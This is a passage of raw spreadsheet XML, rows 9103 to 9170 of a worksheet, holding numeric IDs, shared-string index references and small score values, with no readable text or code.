      <c r="C9103" s="2" t="s">
        <v>8682</v>
      </c>
      <c r="D9103" s="2">
        <v>1.0</v>
      </c>
      <c r="E9103" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9103" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9104" ht="15.75" customHeight="1">
      <c r="A9104" s="1">
        <v>11034.0</v>
      </c>
      <c r="B9104" s="2">
        <v>1.7990876E7</v>
      </c>
      <c r="C9104" s="2" t="s">
        <v>8683</v>
      </c>
      <c r="D9104" s="2">
        <v>1.0</v>
      </c>
      <c r="E9104" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9104" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9105" ht="15.75" customHeight="1">
      <c r="A9105" s="1">
        <v>15408.0</v>
      </c>
      <c r="B9105" s="2">
        <v>4.2853724E7</v>
      </c>
      <c r="C9105" s="2" t="s">
        <v>8684</v>
      </c>
      <c r="D9105" s="2">
        <v>1.0</v>
      </c>
      <c r="E9105" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9105" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9106" ht="15.75" customHeight="1">
      <c r="A9106" s="1">
        <v>16905.0</v>
      </c>
      <c r="B9106" s="2">
        <v>4.8116075E7</v>
      </c>
      <c r="C9106" s="2" t="s">
        <v>8685</v>
      </c>
      <c r="D9106" s="2">
        <v>1.0</v>
      </c>
      <c r="E9106" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9106" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9107" ht="15.75" customHeight="1">
      <c r="A9107" s="1">
        <v>17208.0</v>
      </c>
      <c r="B9107" s="2">
        <v>4.9037054E7</v>
      </c>
      <c r="C9107" s="2" t="s">
        <v>8686</v>
      </c>
      <c r="D9107" s="2">
        <v>1.0</v>
      </c>
      <c r="E9107" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9107" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9108" ht="15.75" customHeight="1">
      <c r="A9108" s="1">
        <v>19353.0</v>
      </c>
      <c r="B9108" s="2">
        <v>5.5391926E7</v>
      </c>
      <c r="C9108" s="2" t="s">
        <v>8687</v>
      </c>
      <c r="D9108" s="2">
        <v>1.0</v>
      </c>
      <c r="E9108" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9108" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9109" ht="15.75" customHeight="1">
      <c r="A9109" s="1">
        <v>32.0</v>
      </c>
      <c r="B9109" s="2">
        <v>1.0538861E7</v>
      </c>
      <c r="C9109" s="2" t="s">
        <v>8688</v>
      </c>
      <c r="D9109" s="2">
        <v>1.0</v>
      </c>
      <c r="E9109" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9109" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9110" ht="15.75" customHeight="1">
      <c r="A9110" s="1">
        <v>132.0</v>
      </c>
      <c r="B9110" s="2">
        <v>1.3269459E7</v>
      </c>
      <c r="C9110" s="2" t="s">
        <v>8689</v>
      </c>
      <c r="D9110" s="2">
        <v>1.0</v>
      </c>
      <c r="E9110" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9110" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9111" ht="15.75" customHeight="1">
      <c r="A9111" s="1">
        <v>509.0</v>
      </c>
      <c r="B9111" s="2">
        <v>1.8152026E7</v>
      </c>
      <c r="C9111" s="2" t="s">
        <v>8690</v>
      </c>
      <c r="D9111" s="2">
        <v>1.0</v>
      </c>
      <c r="E9111" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9111" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9112" ht="15.75" customHeight="1">
      <c r="A9112" s="1">
        <v>708.0</v>
      </c>
      <c r="B9112" s="2">
        <v>2.0555553E7</v>
      </c>
      <c r="C9112" s="2" t="s">
        <v>8691</v>
      </c>
      <c r="D9112" s="2">
        <v>1.0</v>
      </c>
      <c r="E9112" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9112" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9113" ht="15.75" customHeight="1">
      <c r="A9113" s="1">
        <v>840.0</v>
      </c>
      <c r="B9113" s="2">
        <v>2.1628948E7</v>
      </c>
      <c r="C9113" s="2" t="s">
        <v>8692</v>
      </c>
      <c r="D9113" s="2">
        <v>1.0</v>
      </c>
      <c r="E9113" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9113" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9114" ht="15.75" customHeight="1">
      <c r="A9114" s="1">
        <v>974.0</v>
      </c>
      <c r="B9114" s="2">
        <v>2.2765351E7</v>
      </c>
      <c r="C9114" s="2" t="s">
        <v>8693</v>
      </c>
      <c r="D9114" s="2">
        <v>1.0</v>
      </c>
      <c r="E9114" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9114" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9115" ht="15.75" customHeight="1">
      <c r="A9115" s="1">
        <v>1008.0</v>
      </c>
      <c r="B9115" s="2">
        <v>2.3059485E7</v>
      </c>
      <c r="C9115" s="2" t="s">
        <v>8694</v>
      </c>
      <c r="D9115" s="2">
        <v>1.0</v>
      </c>
      <c r="E9115" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9115" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9116" ht="15.75" customHeight="1">
      <c r="A9116" s="1">
        <v>1055.0</v>
      </c>
      <c r="B9116" s="2">
        <v>2.3446584E7</v>
      </c>
      <c r="C9116" s="2" t="s">
        <v>8695</v>
      </c>
      <c r="D9116" s="2">
        <v>1.0</v>
      </c>
      <c r="E9116" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9116" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9117" ht="15.75" customHeight="1">
      <c r="A9117" s="1">
        <v>1582.0</v>
      </c>
      <c r="B9117" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C9117" s="2" t="s">
        <v>8696</v>
      </c>
      <c r="D9117" s="2">
        <v>1.0</v>
      </c>
      <c r="E9117" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9117" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9118" ht="15.75" customHeight="1">
      <c r="A9118" s="1">
        <v>1848.0</v>
      </c>
      <c r="B9118" s="2">
        <v>2.9442348E7</v>
      </c>
      <c r="C9118" s="2" t="s">
        <v>8697</v>
      </c>
      <c r="D9118" s="2">
        <v>1.0</v>
      </c>
      <c r="E9118" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9118" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9119" ht="15.75" customHeight="1">
      <c r="A9119" s="1">
        <v>2128.0</v>
      </c>
      <c r="B9119" s="2">
        <v>3.1438338E7</v>
      </c>
      <c r="C9119" s="2" t="s">
        <v>8698</v>
      </c>
      <c r="D9119" s="2">
        <v>1.0</v>
      </c>
      <c r="E9119" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9119" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9120" ht="15.75" customHeight="1">
      <c r="A9120" s="1">
        <v>2254.0</v>
      </c>
      <c r="B9120" s="2">
        <v>3.2363678E7</v>
      </c>
      <c r="C9120" s="2" t="s">
        <v>8699</v>
      </c>
      <c r="D9120" s="2">
        <v>1.0</v>
      </c>
      <c r="E9120" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9120" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9121" ht="15.75" customHeight="1">
      <c r="A9121" s="1">
        <v>2300.0</v>
      </c>
      <c r="B9121" s="2">
        <v>3.2663415E7</v>
      </c>
      <c r="C9121" s="2" t="s">
        <v>8700</v>
      </c>
      <c r="D9121" s="2">
        <v>1.0</v>
      </c>
      <c r="E9121" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9121" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9122" ht="15.75" customHeight="1">
      <c r="A9122" s="1">
        <v>2438.0</v>
      </c>
      <c r="B9122" s="2">
        <v>3.3683007E7</v>
      </c>
      <c r="C9122" s="2" t="s">
        <v>8701</v>
      </c>
      <c r="D9122" s="2">
        <v>1.0</v>
      </c>
      <c r="E9122" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9122" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9123" ht="15.75" customHeight="1">
      <c r="A9123" s="1">
        <v>2470.0</v>
      </c>
      <c r="B9123" s="2">
        <v>3.3831984E7</v>
      </c>
      <c r="C9123" s="2" t="s">
        <v>8702</v>
      </c>
      <c r="D9123" s="2">
        <v>1.0</v>
      </c>
      <c r="E9123" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9123" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9124" ht="15.75" customHeight="1">
      <c r="A9124" s="1">
        <v>2830.0</v>
      </c>
      <c r="B9124" s="2">
        <v>3.5399115E7</v>
      </c>
      <c r="C9124" s="2" t="s">
        <v>8703</v>
      </c>
      <c r="D9124" s="2">
        <v>1.0</v>
      </c>
      <c r="E9124" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9124" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9125" ht="15.75" customHeight="1">
      <c r="A9125" s="1">
        <v>3033.0</v>
      </c>
      <c r="B9125" s="2">
        <v>3.6456816E7</v>
      </c>
      <c r="C9125" s="2" t="s">
        <v>8704</v>
      </c>
      <c r="D9125" s="2">
        <v>1.0</v>
      </c>
      <c r="E9125" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9125" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9126" ht="15.75" customHeight="1">
      <c r="A9126" s="1">
        <v>3254.0</v>
      </c>
      <c r="B9126" s="2">
        <v>3.7389693E7</v>
      </c>
      <c r="C9126" s="2" t="s">
        <v>8705</v>
      </c>
      <c r="D9126" s="2">
        <v>1.0</v>
      </c>
      <c r="E9126" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9126" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9127" ht="15.75" customHeight="1">
      <c r="A9127" s="1">
        <v>3321.0</v>
      </c>
      <c r="B9127" s="2">
        <v>3.7652122E7</v>
      </c>
      <c r="C9127" s="2" t="s">
        <v>8706</v>
      </c>
      <c r="D9127" s="2">
        <v>1.0</v>
      </c>
      <c r="E9127" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9127" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9128" ht="15.75" customHeight="1">
      <c r="A9128" s="1">
        <v>3369.0</v>
      </c>
      <c r="B9128" s="2">
        <v>3.7900643E7</v>
      </c>
      <c r="C9128" s="2" t="s">
        <v>8707</v>
      </c>
      <c r="D9128" s="2">
        <v>1.0</v>
      </c>
      <c r="E9128" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9128" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9129" ht="15.75" customHeight="1">
      <c r="A9129" s="1">
        <v>3392.0</v>
      </c>
      <c r="B9129" s="2">
        <v>3.7979755E7</v>
      </c>
      <c r="C9129" s="2" t="s">
        <v>8708</v>
      </c>
      <c r="D9129" s="2">
        <v>1.0</v>
      </c>
      <c r="E9129" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9129" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9130" ht="15.75" customHeight="1">
      <c r="A9130" s="1">
        <v>3547.0</v>
      </c>
      <c r="B9130" s="2">
        <v>3.8758581E7</v>
      </c>
      <c r="C9130" s="2" t="s">
        <v>8709</v>
      </c>
      <c r="D9130" s="2">
        <v>1.0</v>
      </c>
      <c r="E9130" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9130" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9131" ht="15.75" customHeight="1">
      <c r="A9131" s="1">
        <v>4000.0</v>
      </c>
      <c r="B9131" s="2">
        <v>4.0897124E7</v>
      </c>
      <c r="C9131" s="2" t="s">
        <v>8710</v>
      </c>
      <c r="D9131" s="2">
        <v>1.0</v>
      </c>
      <c r="E9131" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9131" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9132" ht="15.75" customHeight="1">
      <c r="A9132" s="1">
        <v>4222.0</v>
      </c>
      <c r="B9132" s="2">
        <v>4.1731108E7</v>
      </c>
      <c r="C9132" s="2" t="s">
        <v>8711</v>
      </c>
      <c r="D9132" s="2">
        <v>1.0</v>
      </c>
      <c r="E9132" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9132" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9133" ht="15.75" customHeight="1">
      <c r="A9133" s="1">
        <v>4323.0</v>
      </c>
      <c r="B9133" s="2">
        <v>4.2039468E7</v>
      </c>
      <c r="C9133" s="2" t="s">
        <v>8712</v>
      </c>
      <c r="D9133" s="2">
        <v>1.0</v>
      </c>
      <c r="E9133" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9133" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9134" ht="15.75" customHeight="1">
      <c r="A9134" s="1">
        <v>4419.0</v>
      </c>
      <c r="B9134" s="2">
        <v>4.2299031E7</v>
      </c>
      <c r="C9134" s="2" t="s">
        <v>8713</v>
      </c>
      <c r="D9134" s="2">
        <v>1.0</v>
      </c>
      <c r="E9134" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9134" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9135" ht="15.75" customHeight="1">
      <c r="A9135" s="1">
        <v>4461.0</v>
      </c>
      <c r="B9135" s="2">
        <v>4.2449111E7</v>
      </c>
      <c r="C9135" s="2" t="s">
        <v>8714</v>
      </c>
      <c r="D9135" s="2">
        <v>1.0</v>
      </c>
      <c r="E9135" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9135" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9136" ht="15.75" customHeight="1">
      <c r="A9136" s="1">
        <v>4492.0</v>
      </c>
      <c r="B9136" s="2">
        <v>4.2534694E7</v>
      </c>
      <c r="C9136" s="5" t="s">
        <v>8715</v>
      </c>
      <c r="D9136" s="2">
        <v>1.0</v>
      </c>
      <c r="E9136" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9136" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9137" ht="15.75" customHeight="1">
      <c r="A9137" s="1">
        <v>4605.0</v>
      </c>
      <c r="B9137" s="2">
        <v>4.2835324E7</v>
      </c>
      <c r="C9137" s="2" t="s">
        <v>8716</v>
      </c>
      <c r="D9137" s="2">
        <v>1.0</v>
      </c>
      <c r="E9137" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9137" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9138" ht="15.75" customHeight="1">
      <c r="A9138" s="1">
        <v>4686.0</v>
      </c>
      <c r="B9138" s="2">
        <v>4.3218142E7</v>
      </c>
      <c r="C9138" s="2" t="s">
        <v>8717</v>
      </c>
      <c r="D9138" s="2">
        <v>1.0</v>
      </c>
      <c r="E9138" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9138" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9139" ht="15.75" customHeight="1">
      <c r="A9139" s="1">
        <v>4796.0</v>
      </c>
      <c r="B9139" s="2">
        <v>4.3508251E7</v>
      </c>
      <c r="C9139" s="2" t="s">
        <v>8718</v>
      </c>
      <c r="D9139" s="2">
        <v>1.0</v>
      </c>
      <c r="E9139" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9139" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9140" ht="15.75" customHeight="1">
      <c r="A9140" s="1">
        <v>5400.0</v>
      </c>
      <c r="B9140" s="2">
        <v>4.549059E7</v>
      </c>
      <c r="C9140" s="2" t="s">
        <v>8719</v>
      </c>
      <c r="D9140" s="2">
        <v>1.0</v>
      </c>
      <c r="E9140" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9140" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9141" ht="15.75" customHeight="1">
      <c r="A9141" s="1">
        <v>5600.0</v>
      </c>
      <c r="B9141" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C9141" s="2" t="s">
        <v>8720</v>
      </c>
      <c r="D9141" s="2">
        <v>1.0</v>
      </c>
      <c r="E9141" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9141" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9142" ht="15.75" customHeight="1">
      <c r="A9142" s="1">
        <v>5635.0</v>
      </c>
      <c r="B9142" s="2">
        <v>4.6237691E7</v>
      </c>
      <c r="C9142" s="2" t="s">
        <v>8721</v>
      </c>
      <c r="D9142" s="2">
        <v>1.0</v>
      </c>
      <c r="E9142" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9142" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9143" ht="15.75" customHeight="1">
      <c r="A9143" s="1">
        <v>5927.0</v>
      </c>
      <c r="B9143" s="2">
        <v>4.7236353E7</v>
      </c>
      <c r="C9143" s="2" t="s">
        <v>8722</v>
      </c>
      <c r="D9143" s="2">
        <v>1.0</v>
      </c>
      <c r="E9143" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9143" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9144" ht="15.75" customHeight="1">
      <c r="A9144" s="1">
        <v>5962.0</v>
      </c>
      <c r="B9144" s="2">
        <v>4.732487E7</v>
      </c>
      <c r="C9144" s="2" t="s">
        <v>8723</v>
      </c>
      <c r="D9144" s="2">
        <v>1.0</v>
      </c>
      <c r="E9144" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9144" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9145" ht="15.75" customHeight="1">
      <c r="A9145" s="1">
        <v>5968.0</v>
      </c>
      <c r="B9145" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C9145" s="2" t="s">
        <v>8724</v>
      </c>
      <c r="D9145" s="2">
        <v>1.0</v>
      </c>
      <c r="E9145" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9145" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9146" ht="15.75" customHeight="1">
      <c r="A9146" s="1">
        <v>5981.0</v>
      </c>
      <c r="B9146" s="2">
        <v>4.7389828E7</v>
      </c>
      <c r="C9146" s="2" t="s">
        <v>8725</v>
      </c>
      <c r="D9146" s="2">
        <v>1.0</v>
      </c>
      <c r="E9146" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9146" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9147" ht="15.75" customHeight="1">
      <c r="A9147" s="1">
        <v>6130.0</v>
      </c>
      <c r="B9147" s="2">
        <v>4.7801501E7</v>
      </c>
      <c r="C9147" s="2" t="s">
        <v>8726</v>
      </c>
      <c r="D9147" s="2">
        <v>1.0</v>
      </c>
      <c r="E9147" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9147" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9148" ht="15.75" customHeight="1">
      <c r="A9148" s="1">
        <v>6351.0</v>
      </c>
      <c r="B9148" s="2">
        <v>4.8318012E7</v>
      </c>
      <c r="C9148" s="2" t="s">
        <v>8727</v>
      </c>
      <c r="D9148" s="2">
        <v>1.0</v>
      </c>
      <c r="E9148" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9148" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9149" ht="15.75" customHeight="1">
      <c r="A9149" s="1">
        <v>6358.0</v>
      </c>
      <c r="B9149" s="2">
        <v>4.832691E7</v>
      </c>
      <c r="C9149" s="2" t="s">
        <v>8728</v>
      </c>
      <c r="D9149" s="2">
        <v>1.0</v>
      </c>
      <c r="E9149" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9149" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9150" ht="15.75" customHeight="1">
      <c r="A9150" s="1">
        <v>6666.0</v>
      </c>
      <c r="B9150" s="2">
        <v>4.9113253E7</v>
      </c>
      <c r="C9150" s="2" t="s">
        <v>8729</v>
      </c>
      <c r="D9150" s="2">
        <v>1.0</v>
      </c>
      <c r="E9150" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9150" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9151" ht="15.75" customHeight="1">
      <c r="A9151" s="1">
        <v>6782.0</v>
      </c>
      <c r="B9151" s="2">
        <v>4.9476718E7</v>
      </c>
      <c r="C9151" s="2" t="s">
        <v>8730</v>
      </c>
      <c r="D9151" s="2">
        <v>1.0</v>
      </c>
      <c r="E9151" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9151" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9152" ht="15.75" customHeight="1">
      <c r="A9152" s="1">
        <v>6832.0</v>
      </c>
      <c r="B9152" s="2">
        <v>4.9596959E7</v>
      </c>
      <c r="C9152" s="2" t="s">
        <v>8731</v>
      </c>
      <c r="D9152" s="2">
        <v>1.0</v>
      </c>
      <c r="E9152" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9152" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9153" ht="15.75" customHeight="1">
      <c r="A9153" s="1">
        <v>6856.0</v>
      </c>
      <c r="B9153" s="2">
        <v>4.9646347E7</v>
      </c>
      <c r="C9153" s="2" t="s">
        <v>8732</v>
      </c>
      <c r="D9153" s="2">
        <v>1.0</v>
      </c>
      <c r="E9153" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9153" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9154" ht="15.75" customHeight="1">
      <c r="A9154" s="1">
        <v>6922.0</v>
      </c>
      <c r="B9154" s="2">
        <v>4.9874684E7</v>
      </c>
      <c r="C9154" s="2" t="s">
        <v>8733</v>
      </c>
      <c r="D9154" s="2">
        <v>1.0</v>
      </c>
      <c r="E9154" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9154" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9155" ht="15.75" customHeight="1">
      <c r="A9155" s="1">
        <v>7081.0</v>
      </c>
      <c r="B9155" s="2">
        <v>5.0269401E7</v>
      </c>
      <c r="C9155" s="2" t="s">
        <v>8734</v>
      </c>
      <c r="D9155" s="2">
        <v>1.0</v>
      </c>
      <c r="E9155" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9155" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9156" ht="15.75" customHeight="1">
      <c r="A9156" s="1">
        <v>7118.0</v>
      </c>
      <c r="B9156" s="2">
        <v>5.038896E7</v>
      </c>
      <c r="C9156" s="2" t="s">
        <v>8735</v>
      </c>
      <c r="D9156" s="2">
        <v>1.0</v>
      </c>
      <c r="E9156" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9156" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9157" ht="15.75" customHeight="1">
      <c r="A9157" s="1">
        <v>7242.0</v>
      </c>
      <c r="B9157" s="2">
        <v>5.069489E7</v>
      </c>
      <c r="C9157" s="2" t="s">
        <v>8736</v>
      </c>
      <c r="D9157" s="2">
        <v>1.0</v>
      </c>
      <c r="E9157" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9157" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9158" ht="15.75" customHeight="1">
      <c r="A9158" s="1">
        <v>7252.0</v>
      </c>
      <c r="B9158" s="2">
        <v>5.0729443E7</v>
      </c>
      <c r="C9158" s="2" t="s">
        <v>8737</v>
      </c>
      <c r="D9158" s="2">
        <v>1.0</v>
      </c>
      <c r="E9158" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9158" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9159" ht="15.75" customHeight="1">
      <c r="A9159" s="1">
        <v>7254.0</v>
      </c>
      <c r="B9159" s="2">
        <v>5.0729443E7</v>
      </c>
      <c r="C9159" s="2" t="s">
        <v>8738</v>
      </c>
      <c r="D9159" s="2">
        <v>1.0</v>
      </c>
      <c r="E9159" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9159" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9160" ht="15.75" customHeight="1">
      <c r="A9160" s="1">
        <v>7372.0</v>
      </c>
      <c r="B9160" s="2">
        <v>5.1040297E7</v>
      </c>
      <c r="C9160" s="2" t="s">
        <v>8739</v>
      </c>
      <c r="D9160" s="2">
        <v>1.0</v>
      </c>
      <c r="E9160" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9160" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9161" ht="15.75" customHeight="1">
      <c r="A9161" s="1">
        <v>7519.0</v>
      </c>
      <c r="B9161" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C9161" s="2" t="s">
        <v>8740</v>
      </c>
      <c r="D9161" s="2">
        <v>1.0</v>
      </c>
      <c r="E9161" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9161" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9162" ht="15.75" customHeight="1">
      <c r="A9162" s="1">
        <v>7861.0</v>
      </c>
      <c r="B9162" s="2">
        <v>5.2383264E7</v>
      </c>
      <c r="C9162" s="2" t="s">
        <v>8741</v>
      </c>
      <c r="D9162" s="2">
        <v>1.0</v>
      </c>
      <c r="E9162" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9162" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9163" ht="15.75" customHeight="1">
      <c r="A9163" s="1">
        <v>8172.0</v>
      </c>
      <c r="B9163" s="2">
        <v>5.3236404E7</v>
      </c>
      <c r="C9163" s="2" t="s">
        <v>8742</v>
      </c>
      <c r="D9163" s="2">
        <v>1.0</v>
      </c>
      <c r="E9163" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9163" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9164" ht="15.75" customHeight="1">
      <c r="A9164" s="1">
        <v>8270.0</v>
      </c>
      <c r="B9164" s="2">
        <v>5.3452095E7</v>
      </c>
      <c r="C9164" s="2" t="s">
        <v>8743</v>
      </c>
      <c r="D9164" s="2">
        <v>1.0</v>
      </c>
      <c r="E9164" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9164" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9165" ht="15.75" customHeight="1">
      <c r="A9165" s="1">
        <v>8483.0</v>
      </c>
      <c r="B9165" s="2">
        <v>5.4034135E7</v>
      </c>
      <c r="C9165" s="2" t="s">
        <v>8744</v>
      </c>
      <c r="D9165" s="2">
        <v>1.0</v>
      </c>
      <c r="E9165" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9165" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9166" ht="15.75" customHeight="1">
      <c r="A9166" s="1">
        <v>8692.0</v>
      </c>
      <c r="B9166" s="2">
        <v>5.4417233E7</v>
      </c>
      <c r="C9166" s="5" t="s">
        <v>8745</v>
      </c>
      <c r="D9166" s="2">
        <v>1.0</v>
      </c>
      <c r="E9166" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9166" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9167" ht="15.75" customHeight="1">
      <c r="A9167" s="1">
        <v>9182.0</v>
      </c>
      <c r="B9167" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C9167" s="2" t="s">
        <v>8746</v>
      </c>
      <c r="D9167" s="2">
        <v>1.0</v>
      </c>
      <c r="E9167" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9167" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9168" ht="15.75" customHeight="1">
      <c r="A9168" s="1">
        <v>9190.0</v>
      </c>
      <c r="B9168" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C9168" s="2" t="s">
        <v>8747</v>
      </c>
      <c r="D9168" s="2">
        <v>1.0</v>
      </c>
      <c r="E9168" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9168" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9169" ht="15.75" customHeight="1">
      <c r="A9169" s="1">
        <v>9325.0</v>
      </c>
      <c r="B9169" s="2">
        <v>5.558517E7</v>
      </c>
      <c r="C9169" s="2" t="s">
        <v>8748</v>
      </c>
      <c r="D9169" s="2">
        <v>1.0</v>
      </c>
      <c r="E9169" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9169" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9170" ht="15.75" customHeight="1">
      <c r="A9170" s="1">
        <v>9432.0</v>
      </c>
      <c r="B9170" s="2">
        <v>5.5798146E7</v>
      </c>
